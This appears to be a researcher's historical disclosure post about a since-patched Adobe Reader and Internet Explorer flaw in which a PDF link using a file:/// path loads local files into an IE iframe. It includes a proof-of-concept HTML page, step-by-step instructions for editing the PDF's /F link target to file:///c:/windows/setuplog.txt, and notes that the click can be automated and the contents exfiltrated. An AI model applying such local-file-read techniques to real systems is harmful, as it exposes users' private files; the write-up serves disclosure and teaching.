I was looking at how Adobe Acrobat Reader handled links embedded in PDF files when the PDF was loaded inside an IE iframe. I found that a PDF crafted with an internal link pointing to a file:/// URL — rather than an http URL — would load that local file into the parent IE frame when clicked. The click could also be triggered automatically via PDF JavaScript, requiring no user interaction. This did not work on Vista with Internet Protected Mode enabled.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>PDF_Load_Local_Files_FileProtocol</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>PDF_Load_Local_Files_FileProtocol</h2>
(needs Adobe Acrobat Reader installed and it <b>does not work</b> on Vista with Internet Protected Mode)

<br /><br /><br />

Click the Red Button thay says: "<font color="red"><b>Click here to Access Local Files</b></font>" inside the PDF.<br /><br />
We will load the <b>file:///c:/windows/setuplog.txt</b> inside the IFRAME.<br /><br />
<iframe src="hacked.pdf" width="600" height="200"></iframe><br /><br />
Remember that any of our xDomains will easily access the content and send it wherever we want.<br />
Another important thing to keep in mind is
that the click can be done automatically (PDF JS), without user interaction at all.
</center>
<br />
<hr />
<br />
<font color="blue"><b>The trick is inside the PDF itself. Here are the steps to create one using Nitro PDF:</b></font><br /><br />

<b>1) Create a new PDF from an empty webPage or clipBoard image.</b><br /><br />

<b>2) Add a link to that image/webpage.</b><br />
&nbsp;&nbsp;&nbsp;[Insert and Edit --> Link --> New Link] Action: Page in another document.<br />
&nbsp;&nbsp;&nbsp;I selected a valid pdf as the link (named <font color="blue">test.pdf</font>) , saved the document as hacked.pdf and exit.<br /><br />

<b>3) Edit (notepad) hacked.pdf, find "<font color="blue">test.pdf</font>" and replace it with the desired (including local) URL.</b><br />
&nbsp;&nbsp;&nbsp;String to Find: <font color="blue">test.pdf</font><br />
&nbsp;&nbsp;&nbsp;String Found:   /F (/C/Test/pdf/<font color="blue">test.pdf</font>)<br />
&nbsp;&nbsp;&nbsp;Replaced By:    /F (file:///c:/windows/setuplog.txt)<br /><br />

<b>4) That's it. Now we have a PDF that -when clicked- it will load the local file inside IE.</b>



</body>
</html>

The PDF specification’s link action type “Page in another document” (/F) accepts any file path, including file:/// URLs. Acrobat Reader passed that URL directly to IE’s navigation, which honored it and loaded the local file into the iframe. The key insight for crafting the malicious PDF was that after creating a legitimate PDF with a normal link, you could open the PDF file in a text editor and manually replace the benign target path (/C/Test/pdf/test.pdf) with the desired local path. Acrobat would accept the modified PDF and follow the link normally. Combined with the UXSS techniques documented in earlier posts, an attacker could silently read the contents of that local file and exfiltrate it.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.